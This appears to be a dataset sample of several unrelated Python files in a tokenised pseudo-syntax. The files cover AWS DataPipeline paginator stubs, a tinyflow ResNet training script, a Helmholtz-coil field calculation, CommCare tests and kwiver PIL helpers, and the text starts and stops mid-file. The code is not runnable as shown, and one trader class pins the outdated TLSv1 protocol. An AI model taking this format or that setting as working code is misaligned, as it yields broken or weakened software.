*(string) --* The ID of the object. - **name** *(string) --* The name of the object. - **fields** *(list) --* Key-value pairs that define the properties of the object. - *(dict) --* A key-value pair that describes a property of a pipeline object. The value is specified as either a string value (``StringValue`` ) or a reference to another object (``RefValue`` ) but not as both. - **key** *(string) --* The field identifier. - **stringValue** *(string) --* The field value, expressed as a String. - **refValue** *(string) --* The field value, expressed as the identifier of another object. - **hasMoreResults** *(boolean) --* Indicates whether there are more results to return. - **NextToken** *(string) --* A token to resume pagination. :type pipelineId: string :param pipelineId: **[REQUIRED]** The ID of the pipeline that contains the object definitions. :type objectIds: list :param objectIds: **[REQUIRED]** The IDs of the pipeline objects that contain the definitions to be described. You can pass as many as 25 identifiers in a single call to ``DescribeObjects`` . - *(string) --* :type evaluateExpressions: boolean :param evaluateExpressions: Indicates whether any expressions in the object should be evaluated when the object descriptions are returned. :type PaginationConfig: dict :param PaginationConfig: A dictionary that provides parameters to control pagination. - **MaxItems** *(integer) --* The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination. - **PageSize** *(integer) --* The size of each page. - **StartingToken** *(string) --* A token to specify where to start paginating. This is the ``NextToken`` from a previous response. :rtype: dict :returns: """<line_sep><pass><block_end><block_end><class_stmt>ListPipelines(Paginator)<block_start><def_stmt>paginate self PaginationConfig:Dict=<none><arrow>Dict<block_start>""" Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.list_pipelines`. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/ListPipelines>`_ **Request Syntax** :: response_iterator = paginator.paginate( PaginationConfig={ 'MaxItems': 123, 'PageSize': 123, 'StartingToken': 'string' } ) **Response Syntax** :: { 'pipelineIdList': [ { 'id': 'string', 'name': 'string' }, ], 'hasMoreResults': True|False, 'NextToken': 'string' } **Response Structure** - *(dict) --* Contains the output of ListPipelines. - **pipelineIdList** *(list) --* The pipeline identifiers. If you require additional information about the pipelines, you can use these identifiers to call DescribePipelines and GetPipelineDefinition . - *(dict) --* Contains the name and identifier of a pipeline. - **id** *(string) --* The ID of the pipeline that was assigned by AWS Data Pipeline. This is a string of the form ``df-297EG78HU43EEXAMPLE`` . - **name** *(string) --* The name of the pipeline. - **hasMoreResults** *(boolean) --* Indicates whether there are more results that can be obtained by a subsequent call. - **NextToken** *(string) --* A token to resume pagination. :type PaginationConfig: dict :param PaginationConfig: A dictionary that provides parameters to control pagination. - **MaxItems** *(integer) --* The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination. - **PageSize** *(integer) --* The size of each page. - **StartingToken** *(string) --* A token to specify where to start paginating. This is the ``NextToken`` from a previous response. :rtype: dict :returns: """<line_sep><pass><block_end><block_end><class_stmt>QueryObjects(Paginator)<block_start><def_stmt>paginate self pipelineId:str sphere:str query:Dict=<none> PaginationConfig:Dict=<none><arrow>Dict<block_start>""" Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.query_objects`. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/QueryObjects>`_ **Request Syntax** :: response_iterator = paginator.paginate( pipelineId='string', query={ 'selectors': [ { 'fieldName': 'string', 'operator': { 'type': 'EQ'|'REF_EQ'|'LE'|'GE'|'BETWEEN', 'values': [ 'string', ] } }, ] }, sphere='string', PaginationConfig={ 'MaxItems': 123, 'PageSize': 123, 'StartingToken': 'string' } ) **Response Syntax** :: { 'ids': [ 'string', ], 'hasMoreResults': True|False, 'NextToken': 'string' } **Response Structure** - *(dict) --* Contains the output of QueryObjects. - **ids** *(list) --* The identifiers that match the query selectors. - *(string) --* - **hasMoreResults** *(boolean) --* Indicates whether there are more results that can be obtained by a subsequent call. - **NextToken** *(string) --* A token to resume pagination. :type pipelineId: string :param pipelineId: **[REQUIRED]** The ID of the pipeline. :type query: dict :param query: The query that defines the objects to be returned. The ``Query`` object can contain a maximum of ten selectors. The conditions in the query are limited to top-level String fields in the object. These filters can be applied to components, instances, and attempts. - **selectors** *(list) --* List of selectors that define the query. An object must satisfy all of the selectors to match the query. - *(dict) --* A comparision that is used to determine whether a query should return this object. - **fieldName** *(string) --* The name of the field that the operator will be applied to. The field name is the \"key\" portion of the field definition in the pipeline definition syntax that is used by the AWS Data Pipeline API. If the field is not set on the object, the condition fails. - **operator** *(dict) --* Contains a logical operation for comparing the value of a field with a specified value. - **type** *(string) --* The logical operation to be performed: equal (``EQ`` ), equal reference (``REF_EQ`` ), less than or equal (``LE`` ), greater than or equal (``GE`` ), or between (``BETWEEN`` ). Equal reference (``REF_EQ`` ) can be used only with reference fields. The other comparison types can be used only with String fields. The comparison types you can use apply only to certain object fields, as detailed below. The comparison operators EQ and REF_EQ act on the following fields: * name * @sphere * parent * @componentParent * @instanceParent * @status * @scheduledStartTime * @scheduledEndTime * @actualStartTime * @actualEndTime The comparison operators ``GE`` , ``LE`` , and ``BETWEEN`` act on the following fields: * @scheduledStartTime * @scheduledEndTime * @actualStartTime * @actualEndTime Note that fields beginning with the at sign (@) are read-only and set by the web service. When you name fields, you should choose names containing only alpha-numeric values, as symbols may be reserved by AWS Data Pipeline. User-defined fields that you add to a pipeline should prefix their name with the string \"my\". - **values** *(list) --* The value that the actual field value will be compared with. - *(string) --* :type sphere: string :param sphere: **[REQUIRED]** Indicates whether the query applies to components or instances. The possible values are: ``COMPONENT`` , ``INSTANCE`` , and ``ATTEMPT`` . :type PaginationConfig: dict :param PaginationConfig: A dictionary that provides parameters to control pagination. - **MaxItems** *(integer) --* The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination. - **PageSize** *(integer) --* The size of each page. - **StartingToken** *(string) --* A token to specify where to start paginating. This is the ``NextToken`` from a previous response. :rtype: dict :returns: """<line_sep><pass><block_end><block_end>
<import_stmt>tinyflow<as>tf<import_from_stmt>tinyflow.datasets get_cifar10<import_stmt>numpy<as>np<line_sep>num_epoch=10<line_sep>num_batch=600<line_sep>batch_size=100<def_stmt>conv_factory x filter_size in_filters out_filters<block_start>x=tf.nn.conv2d(x num_filter=out_filters ksize=[1 filter_size filter_size 1] padding='SAME')<line_sep>x=tf.nn.batch_normalization(x)<line_sep>x=tf.nn.relu(x)<line_sep><return>x<block_end><def_stmt>residual_factory x in_filters out_filters<block_start><if_stmt>in_filters<eq>out_filters<block_start>orig_x=x<line_sep>conv1=conv_factory(x 3 in_filters out_filters)<line_sep>conv2=conv_factory(conv1 3 out_filters out_filters)<line_sep>new=orig_x+conv2<line_sep><return>tf.nn.relu(new)<block_end><else_stmt><block_start>conv1=conv_factory(x 3 in_filters out_filters)<line_sep>conv2=conv_factory(conv1 3 out_filters out_filters)<line_sep>project_x=conv_factory(x 1 in_filters out_filters)<line_sep>new=project_x+conv2<line_sep><return>tf.nn.relu(new)<block_end><block_end><def_stmt>resnet x n in_filters out_filters<block_start><for_stmt>i range(n)<block_start><if_stmt>i<eq>0<block_start>x=residual_factory(x in_filters 16)<block_end><else_stmt><block_start>x=residual_factory(x 16 16)<block_end><block_end><for_stmt>i range(n)<block_start><if_stmt>i<eq>0<block_start>x=residual_factory(x 16 32)<block_end><else_stmt><block_start>x=residual_factory(x 32 32)<block_end><block_end><for_stmt>i range(n)<block_start><if_stmt>i<eq>0<block_start>x=residual_factory(x 32 64)<block_end><else_stmt><block_start>x=residual_factory(x 64 64)<block_end><block_end><return>x<block_end>x=tf.placeholder(tf.float32)<line_sep>conv1=tf.nn.conv2d(x num_filter=16 ksize=[1 5 5 1] padding='SAME')<line_sep>tanh1=tf.tanh(conv1)<line_sep>res=resnet(tanh1 1 16 64)<line_sep>pool1=tf.nn.avg_pool(res ksize=[1 4 4 1] strides=[1 2 2 1] padding='SAME' data_format='NCHW')<line_sep>conv2=tf.nn.conv2d(pool1 num_filter=16 ksize=[1 5 5 1])<line_sep>flatten=tf.nn.flatten_layer(conv2)<line_sep>fc1=tf.nn.linear(flatten num_hidden=10 name="fc1")<line_sep># define loss label=tf.placeholder(tf.float32)<line_sep>cross_entropy=tf.nn.mean_sparse_softmax_cross_entropy_with_logits(fc1 label)<line_sep>train_step=tf.train.AdamOptimizer(0.0005).minimize(cross_entropy)<line_sep>sess=tf.Session(config='gpu')<line_sep># Auromatic variable shape inference API, infers the shape and initialize the weights. known_shape={x:[batch_size 3 32 32] label:[batch_size]}<line_sep>stdev=0.01<line_sep>init_step=[]<for_stmt>v,name,shape tf.infer_variable_shapes(cross_entropy feed_dict=known_shape)<block_start>init_step.append(tf.assign(v tf.normal(shape stdev)))<line_sep>print("shape[%s]=%s"%(name str(shape)))<block_end>sess.run(init_step)<line_sep>sess.run(tf.initialize_all_variables())<line_sep># get the cifar dataset cifar=get_cifar10()<for_stmt>epoch range(num_epoch)<block_start>sum_loss=0.0<for_stmt>i range(num_batch)<block_start>batch_xs,batch_ys=cifar.train.next_batch(batch_size)<line_sep>loss,_=sess.run([cross_entropy train_step] feed_dict={x:batch_xs label:batch_ys})<line_sep>sum_loss<augadd>loss<block_end>print("epoch[%d] cross_entropy=%g"%(epoch sum_loss/num_batch))<block_end>correct_prediction=tf.equal(tf.argmax(fc1 1) label)<line_sep>accuracy=tf.reduce_mean(correct_prediction)<line_sep>print(sess.run(accuracy feed_dict={x:cifar.test.images label:cifar.test.labels}))<line_sep>
<import_from_stmt>.colorpicker MDColorPicker# NOQA F401
""" * Copyright 2007,2008,2009 <NAME> * Copyright (C) 2009 <NAME> <<EMAIL>> * * Licensed under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at: * * http:#www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, * either express or implied. See the License for the specific * language governing permissions and limitations under the * License. * """<line_sep>"""* * Defines how the <tt>update</tt> method updates the touched * point, that is, the point the user is considered to be * hovered over. * * @see #update(TouchedPointUpdateOption) update * """<class_stmt>TouchedPointUpdateOption(object)<block_start><def_stmt>__init__ self<block_start><pass><block_end><block_end>"""* * When this option is passed to the update method, any * touched point is cleared as a consequence of the update. * <p> * * This option can be used when you want to "start fresh" * with regards to hover feedback after an update, and want * to assure that only explicit user-generated mouse move * actions (rather than objects moving <i>underneath</i> a * fixed-position mouse cursor) can trigger hover feedback. * * @see #update update * @see #TOUCHED_POINT_LOCKED TOUCHED_POINT_LOCKED * @see #TOUCHED_POINT_UPDATED TOUCHED_POINT_UPDATED * """<line_sep>TOUCHED_POINT_CLEARED=TouchedPointUpdateOption()<line_sep>"""* * When this option is passed to the update method, any * previously touched point is locked in (remains unchanged). * <p> * * For example, if the mouse is over a certain point before * the update, and that point moves away from the mouse * (without the mouse moving otherwise) as a consequence of * the update, the hover feedback remains "locked in" to the * original point, even though the mouse is no longer on top * of that point. * <p> * * This option is useful for hover widgets that modify the * position, size, symbol of points/curves, and do not want the * selected point/curve (and popup hover widget) to change as * a consequence of such changes. * <p> * * <i>Note:</i> If the currently touched point or the curve * containing it is deleted, GChart sets the touched point * reference to <tt>None</tt>. In that case, this option and * <tt>TOUCHED_POINT_CLEARED</tt> behave the same way. * * * @see #update update * @see #TOUCHED_POINT_CLEARED TOUCHED_POINT_CLEARED * @see #TOUCHED_POINT_UPDATED TOUCHED_POINT_UPDATED * """<line_sep>TOUCHED_POINT_LOCKED=TouchedPointUpdateOption()<line_sep>"""* * When this option is passed to the update method, the * touched point is updated so that it reflects whatever point * is underneath the mouse cursor after the update * completes. * <p> * * For example, if the mouse is not hovering over any point * before the update, but the update repositions one of the * points so that it is now underneath the mouse cursor, * the hover feedback for that point will be displayed. * Similarly, if the update moves a point away from the * mouse cursor, previously displayed hover feedback will * be eliminated. * <p> * * @see #update update * @see #TOUCHED_POINT_CLEARED TOUCHED_POINT_CLEARED * @see #TOUCHED_POINT_LOCKED TOUCHED_POINT_LOCKED * """<line_sep>TOUCHED_POINT_UPDATED=TouchedPointUpdateOption()<line_sep>
""" Helmoltz coils ============== A script that computes the magnetic field generated by a pair of Helmoltz coils. """<import_stmt>numpy<as>np<import_from_stmt>scipy special linalg<line_sep>############################################################################## # Function to caculate the field of a loop <def_stmt>base_vectors n<block_start>""" Returns 3 orthognal base vectors, the first one colinear to n. """<line_sep># normalize n n=n/np.sqrt(np.square(n).sum(axis=-1))<line_sep># choose two vectors perpendicular to n # choice is arbitrary since the coil is symetric about n <if_stmt>abs(n[0])<eq>1<block_start>l=np.r_[n[2] 0 -n[0]]<block_end><else_stmt><block_start>l=np.r_[0 n[2] -n[1]]<block_end>l=l/np.sqrt(np.square(l).sum(axis=-1))<line_sep>m=np.cross(n l)<line_sep><return>n l m<block_end><def_stmt>B_field r n r0 R<block_start>""" returns the magnetic field from an arbitrary current loop calculated from eqns (1) and (2) in Phys Rev A Vol. 35, N 4, pp. 1535-1546; 1987. Parameters ---------- n is normal vector to the plane of the loop at the center, current is oriented by the right-hand-rule. r is a position vector where the Bfield is evaluated: [x1 y2 z3 ; x2 y2 z2 ; ... ] r is in units of d r0 is the location of the center of the loop in units of d: [x y z] R is the radius of the loop Returns ------- B is a vector for the B field at point r in inverse units of (mu I) / (2 pi d) for I in amps and d in meters and mu = 4 pi * 10^-7 we get Tesla """<line_sep>### Translate the coordinates in the coil's frame n,l,m=base_vectors(n)<line_sep># transformation matrix coil frame to lab frame trans=np.vstack((l m n))<line_sep># transformation matrix to lab frame to coil frame inv_trans=linalg.inv(trans)<line_sep>r=r-r0#point location from center of coil r=np.dot(r inv_trans)#transform vector to coil frame #### calculate field # express the coordinates in polar form x=r[: 0]<line_sep>y=r[: 1]<line_sep>z=r[: 2]<line_sep>rho=np.sqrt(x<power>2+y<power>2)<line_sep>theta=np.arctan(x/y)<line_sep># NaNs are generated where y is zero. theta[y<eq>0]=np.pi/2<line_sep>E=special.ellipe((4<times>R<times>rho)/((R+rho)<power>2+z<power>2))<line_sep>K=special.ellipk((4<times>R<times>rho)/((R+rho)<power>2+z<power>2))<line_sep>dist=((R-rho)<power>2+z<power>2)<line_sep>Bz=1/np.sqrt((R+rho)<power>2+z<power>2)<times>(K+E<times>(R<power>2-rho<power>2-z<power>2)/dist)<line_sep>Brho=z/(rho<times>np.sqrt((R+rho)<power>2+z<power>2))<times>(-K+E<times>(R<power>2+rho<power>2+z<power>2)/dist)<line_sep># On the axis of the coil we get a divided by zero here. This returns a # NaN, where the field is actually zero : Brho[dist<eq>0]=0<line_sep>Brho[rho<eq>0]=0<line_sep>Bz[dist<eq>0]=0<line_sep>B=np.c_[np.cos(theta)<times>Brho np.sin(theta)<times>Brho Bz]<line_sep># Rotate the field back in the lab's frame B=np.dot(B trans)<line_sep><return>B<block_end>############################################################################## # The grid of points on which we want to evaluate the field X,Y,Z=np.mgrid[-0.15:0.15:31j -0.15:0.15:31j -0.15:0.15:31j]<line_sep># Avoid rounding issues : f=1e4# this gives the precision we are interested in: X=np.round(X<times>f)/f<line_sep>Y=np.round(Y<times>f)/f<line_sep>Z=np.round(Z<times>f)/f<line_sep># The (x, y, z) position vector r=np.c_[np.ravel(X) np.ravel(Y) np.ravel(Z)]<line_sep>############################################################################## # The coil positions # The center of the coil r0=np.r_[0 0 0.1]<line_sep># The normal to the coils n=np.r_[0 0 1]<line_sep># The radius R=0.1<line_sep># Add the mirror image of this coils relatively to the xy plane : r0=np.vstack((r0 -r0))<line_sep>R=np.r_[R R]<line_sep>n=np.vstack((n n))# Helmoltz like configuration ############################################################################## # Calculate field # First initialize a container matrix for the field vector : B=np.zeros_like(r)<line_sep># Then loop through the different coils and sum the fields : <for_stmt>this_n,this_r0,this_R zip(n r0 R)<block_start>this_n=np.array(this_n)<line_sep>this_r0=np.array(this_r0)<line_sep>this_R=np.array(this_R)<line_sep>B<augadd>B_field(r this_n this_r0 this_R)<block_end>
# Copyright (c) 2021 Horizon Robotics and ALF Contributors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>functools partial<import_stmt>torch<import_stmt>alf<import_from_stmt>alf.algorithms.off_policy_algorithm OffPolicyAlgorithm<import_from_stmt>alf.data_structures AlgStep LossInfo<import_from_stmt>alf.tensor_specs TensorSpec<class_stmt>MyOffPolicyAlgorithm(OffPolicyAlgorithm)<block_start><def_stmt>__init__ self observation_spec action_spec reward_spec=<none> env=<none> config=<none> debug_summaries=<false><block_start>rollout_state_spec=TensorSpec(shape=() dtype=torch.int32)<line_sep>train_state_spec=TensorSpec(shape=(2 ))<line_sep>super().__init__(env=env config=config debug_summaries=debug_summaries observation_spec=observation_spec action_spec=action_spec train_state_spec=train_state_spec rollout_state_spec=rollout_state_spec)<block_end><def_stmt>rollout_step self inputs state<block_start>print("rollout_step: " state)<line_sep>is_first_steps=inputs.is_first()<line_sep>is_zero_state=(state<eq>0)<assert_stmt>torch.all(is_zero_state[is_first_steps])<line_sep><return>AlgStep(output=inputs.prev_action state=state-1)<block_end><def_stmt>train_step self inputs state rollout_info<block_start>print("train_step: " state)<line_sep><return>AlgStep(output=inputs.prev_action state=state+1)<block_end><def_stmt>calc_loss self info<block_start><return>LossInfo()<block_end><block_end>alf.config('create_environment' num_parallel_environments=10)<line_sep>alf.config('TrainerConfig' algorithm_ctor=MyOffPolicyAlgorithm whole_replay_buffer_training=<false> use_rollout_state=<false> mini_batch_length=2 unroll_length=3 mini_batch_size=4 num_updates_per_train_iter=1 num_iterations=1)<line_sep>
<import_stmt>ssl<import_stmt>random<import_stmt>requests<import_from_stmt>requests.adapters HTTPAdapter<import_from_stmt>requests.packages.urllib3.poolmanager PoolManager<import_from_stmt>.DyTrader *<class_stmt>Ssl3HttpAdapter(HTTPAdapter)<block_start><def_stmt>init_poolmanager self connections maxsize block=<false><block_start>self.poolmanager=PoolManager(num_pools=connections maxsize=maxsize block=block ssl_version=ssl.PROTOCOL_TLSv1)<block_end><block_end><class_stmt>WebTrader(DyTrader)<block_start>""" 券商Web交易接口基类 """<line_sep>name='Web'<line_sep>heartBeatTimer=60<line_sep>pollingCurEntrustTimer=1<line_sep>maxRetryNbr=3# 最大重试次数 <def_stmt>__init__ self eventEngine info configFile=<none> accountConfigFile=<none><block_start>super().__init__(eventEngine info configFile accountConfigFile)<line_sep>self._httpAdapter=<none><block_end><def_stmt>_preLogin self# 开始一个会话 <block_start>self._session=requests.session()<if_stmt>self._httpAdapter<is><not><none><block_start>self._session.mount('https://' self._httpAdapter())<block_end># session headers headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}<line_sep>self._session.headers.update(headers)<block_end><def_stmt>_postLogout self<block_start>self._session.close()<block_end><block_end>
<import_from_stmt>django.test.testcases TestCase<import_from_stmt>mock patch<import_from_stmt>corehq.form_processor.models CommCareCaseSQL<import_from_stmt>datetime datetime<import_from_stmt>corehq.form_processor.interfaces.dbaccessors CaseAccessors<import_from_stmt>corehq.motech.repeater_helpers get_relevant_case_updates_from_form_json<class_stmt>TestRepeaterHelpers(TestCase)<block_start><def_stmt>setUp self<block_start>self.domain='test-domain'<line_sep>self.extra_fields=[]<line_sep>self.form_question_values={}<line_sep>case_1_data={'case_id':'5ca13e74-8ba3-4d0d-l09j-66371e8895dd' 'domain':self.domain 'type':'paciente' 'name':'case1' 'owner_id':'owner_1' 'modified_by':'modified_by' }<line_sep>case_2_data={'case_id':'6ca13e74-8ba3-4d0d-l09j-66371e8895dc' 'domain':self.domain 'type':'casa' 'name':'case2' 'owner_id':'owner_2' 'modified_by':'modified_by' }<line_sep>self.case_1=create_commcare_case(case_1_data)<line_sep>self.case_2=create_commcare_case(case_2_data)<block_end><def_stmt>tearDown self<block_start>self.case_1.delete()<line_sep>self.case_2.delete()<block_end>@patch.object(CaseAccessors 'get_cases')<def_stmt>test__get_relevant_case_updates_from_form_json_with_case_types self get_cases<block_start>get_cases.return_value=[self.case_1 self.case_2]<line_sep>result=get_relevant_case_updates_from_form_json(self.domain _get_form_json() ['paciente'] self.extra_fields)<line_sep>self.assertEqual(len(result) 2)<block_end>@patch.object(CaseAccessors 'get_cases')<def_stmt>test__get_relevant_case_updates_from_form_json_without_case_types self get_cases<block_start>get_cases.return_value=[self.case_1 self.case_2]<line_sep>result=get_relevant_case_updates_from_form_json(self.domain _get_form_json() [] self.extra_fields)<line_sep>self.assertEqual(len(result) 3)<block_end><block_end><def_stmt>create_commcare_case data<block_start>cccsql=CommCareCaseSQL(case_id=data['case_id'] domain=data['domain'] type=data['type'] name=data['name'] owner_id=data['owner_id'] modified_by=data['modified_by'] modified_on=datetime.utcnow() server_modified_on=datetime.utcnow() )<line_sep>cccsql.save()<line_sep><return>cccsql<block_end><def_stmt>_get_form_json <block_start><return>{'app_id':'APP_ID' 'archived':<false> 'attachments':{'form.xml':{'content_type':'text/xml' 'length':10975 'url':'https://www.commcarehq.org/a/infomovel-pepfar'<concat>'/api/form/attachment/CONFIDENTIAL/form.xml'}} 'build_id':'BUILD_ID' 'domain':'infomovel-pepfar' 'edited_by_user_id':<none> 'edited_on':<none> 'form':{'#type':'data' '@name':'SOME NAME' '@uiVersion':'1' '@version':'VERSION' '@xmlns':'http://openrosa.org/formdesigner/IDIDID' 'casa_data':{'convivente_cascade':{} 'conviventes_names':{} 'index_cascade':{} 'save_to_case':{'alocar_paciente_casa':{'case':{'@case_id':'5ca13e74-8ba3-4d0d-l09j-66371e8895dd' '@date_modified':'2021-06-24T08:43:06.746000Z' '@user_id':'USER ID' '@xmlns':'http://commcarehq.org/case/transaction/v2' 'index':{'parent':{'#text':'6ca13e74-8ba3-4d0d-l09j-66371e8895dc' '@case_type':'' '@relationship':'child'}}}} 'criar_actualizar_casa':{'case':{'@case_id':'6ca13e74-8ba3-4d0d-l09j-66371e8895dc' '@date_modified':'2021-05-24T08:43:06.746000Z' '@user_id':'USER ID' '@xmlns':'http://commcarehq.org/case/transaction/v2' 'create':{'case_name':'CASE NAME' 'case_type':'casa' 'owner_id':'owner_1'} 'update':{'age_range1':'25-30' 'age_range2':'25-30 anos' }}}} 'tb_patient_in_household':'0'} 'case':{'@case_id':'5ca13e74-8ba3-4d0d-l09j-66371e8895dd' '@date_modified':'2021-06-24T08:43:06.746000Z' '@user_id':'USER ID' '@xmlns':'http://commcarehq.org/case/transaction/v2' 'update':{'name':'<NAME>'}} 'confirm_info':{} 'confirmar_perfil':{} 'imported_properties':{} 'indicators_v4':{} 'key_workflow_properties':{} 'meta':{} 'patient_data':{} } 'metadata':{} }<block_end>
<class_stmt>PPSTimingCalibrationModeEnum<block_start>CondDB=0<line_sep>JSON=1<line_sep>SQLite=2<block_end>
<import_stmt>turbodbc.data_types<import_from_stmt>turbodbc STRING BINARY NUMBER DATETIME ROWID<line_sep>ALL_TYPE_CODES=[turbodbc.data_types._BOOLEAN_CODE turbodbc.data_types._INTEGER_CODE turbodbc.data_types._FLOATING_POINT_CODE turbodbc.data_types._STRING_CODE turbodbc.data_types._UNICODE_CODE turbodbc.data_types._TIMESTAMP_CODE turbodbc.data_types._DATE_CODE]<line_sep>ALL_DATA_TYPES=[STRING BINARY NUMBER DATETIME ROWID]<def_stmt>test_each_type_code_matches_one_data_type <block_start><for_stmt>type_code ALL_TYPE_CODES<block_start>matches=[type<for>type ALL_DATA_TYPES<if>type_code<eq>type]<assert_stmt>1<eq>len(matches)<block_end><block_end><def_stmt>test_each_type_code_mismatches_all_but_one_data_type <block_start><for_stmt>type_code ALL_TYPE_CODES<block_start>mismatches=[type<for>type ALL_DATA_TYPES<if>type_code<ne>type]<line_sep>expected=len(ALL_DATA_TYPES)-1<assert_stmt>expected<eq>len(mismatches)<block_end><block_end>
""" ckwg +31 Copyright 2017 by Kitware, Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither name of Kitware, Inc. nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ============================================================================== Helper functions for dealing with PIL """<import_from_stmt>kwiver.vital.types Image<import_stmt>six<def_stmt>_pil_image_to_bytes p_img<block_start>""" Get the component bytes from the given PIL Image. In recent version of PIL, the tobytes function is the correct thing to call, but some older versions of PIL do not have this function. :param p_img: PIL Image to get the bytes from. :type p_img: PIL.Image.Image :returns: Byte string. :rtype: bytes """<if_stmt>hasattr(p_img 'tobytes')<block_start><return>p_img.tobytes()<block_end><else_stmt># Older version of the function. <block_start><return>p_img.tostring()<block_end><block_end><def_stmt>_pil_image_from_bytes mode size data decoder_name='raw' *args<block_start>""" Creates a copy of an image memory from pixel data in a buffer. In recent versionf of PIL, the frombytes function is the correct thing to call, but older version fo PIL only have a fromstring, which is equivalent in function. :param mode: The image mode. See: :ref:`concept-modes`. :param size: The image size. :param data: A byte buffer containing raw data for the given mode. :param decoder_name: What decoder to use. :param args: Additional parameters for the given decoder. :returns: An :py:class:`~PIL.Image.Image` object. """<import_stmt>PIL.Image<if_stmt>hasattr(PIL.Image 'frombytes')<block_start><return>PIL.Image.frombytes(mode size data decoder_name *args)<block_end><else_stmt><block_start><return>PIL.Image.fromstring(mode size data decoder_name *args)<block_end><block_end><def_stmt>from_pil pil_image<block_start>""" Construct Image from supplied PIL image object. :param pil_image: PIL image object :type pil_image: PIL.Image.Image :raises RuntimeError: If the PIL Image provided is not in a recognized mode. :returns: New Image instance using the given image's pixels. :rtype: Image """<line_sep>(img_width img_height)=pil_image.size<line_sep>mode=pil_image.mode<line_sep># TODO(paul.tunison): Extract this logic out into a utility function. <if_stmt>mode<eq>"1"# boolean <block_start>img_depth=1<line_sep>img_w_step=1<line_sep>img_h_step=img_width<line_sep>img_d_step=0<line_sep>img_pix_num_bytes=1<line_sep>img_pix_type=Image.PIXEL_BOOL<block_end><elif_stmt>mode<eq>"L"# 8-bit greyscale <block_start>img_depth=1<line_sep>img_w_step=1<line_sep>img_h_step=img_width<line_sep>img_d_step=0<line_sep>img_pix_num_bytes=1<line_sep>img_pix_type=Image.PIXEL_UNSIGNED<block_end><elif_stmt>mode<eq>"RGB"# 8-bit RGB <block_start>img_depth=3<line_sep>img_w_step=3<line_sep>img_h_step=img_width<times>3<line_sep>img_d_step=1<line_sep>img_pix_num_bytes=1<line_sep>img_pix_type=Image.PIXEL_UNSIGNED<block_end><elif_stmt>mode<eq>"RGBA"# 8-bit RGB with alpha <block_start>img_depth=4<line_sep>img_w_step=4<line_sep>img_h_step=img_width<times>4<line_sep>img_d_step=1<line_sep>img_pix_num_bytes=1<line_sep>img_pix_type=Image.PIXEL_UNSIGNED<block_end><elif_stmt>mode<eq>"I"# 32-bit signed int greyscale <block_start>img_depth=1<line_sep>img_w_step=1<line_sep>img_h_step=img_width<line_sep>img_d_step=0<line_sep>img_pix_num_bytes=4<line_sep>img_pix_type=Image.PIXEL_SIGNED<block_end><elif_stmt>mode<eq>"F"# 32-bit float greyscale <block_start>img_depth=1<line_sep>img_w_step=1<line_sep>img_h_step=img_width<line_sep>img_d_step=0<line_sep>img_pix_num_bytes=4<line_sep>img_pix_type=Image.PIXEL_FLOAT<block_end><else_stmt><block_start><raise>RuntimeError("Unsupported image format.")<block_end>img_data=_pil_image_to_bytes(pil_image)<line_sep>vital_img=Image(img_data img_width img_height img_depth img_w_step img_h_step img_d_step img_pix_type img_pix_num_bytes)<line_sep><return>vital_img<block_end><def_stmt>get_pil_image img<block_start>""" Get image in python friendly format Assumptions are that the image has byte pixels. :return: array containing image :rtype: pil image """<def_stmt>pil_mode_from_image img<block_start>""" Determine image format from pixel properties May return None if our current encoding does not map to a PIL image mode. 